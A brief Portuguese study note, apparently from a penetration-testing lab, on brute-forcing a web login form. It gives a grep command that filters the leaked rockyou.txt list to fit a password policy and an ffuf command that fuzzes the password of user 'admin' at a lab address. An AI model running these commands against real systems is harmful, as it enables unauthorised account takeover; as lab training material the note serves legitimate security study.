Brute-Forcing Passwords

• Criar uma lista de palavras que correspode à política de senha implementada pelo aplicativo web de destino

grep '[[:upper:]]' /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '.{10}' > custom_wordlist.txt

• Interceptar a solicitação de login para saber os nomes dos parâmetros POST e a mensagem de erro retornada na resposta, isso pode ser feito no burpsuite

• Usar p fuff para quebrar a senha de usuário

 ffuf -w ./custom_wordlist.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=admin&password=FUZZ" -fr "Invalid username"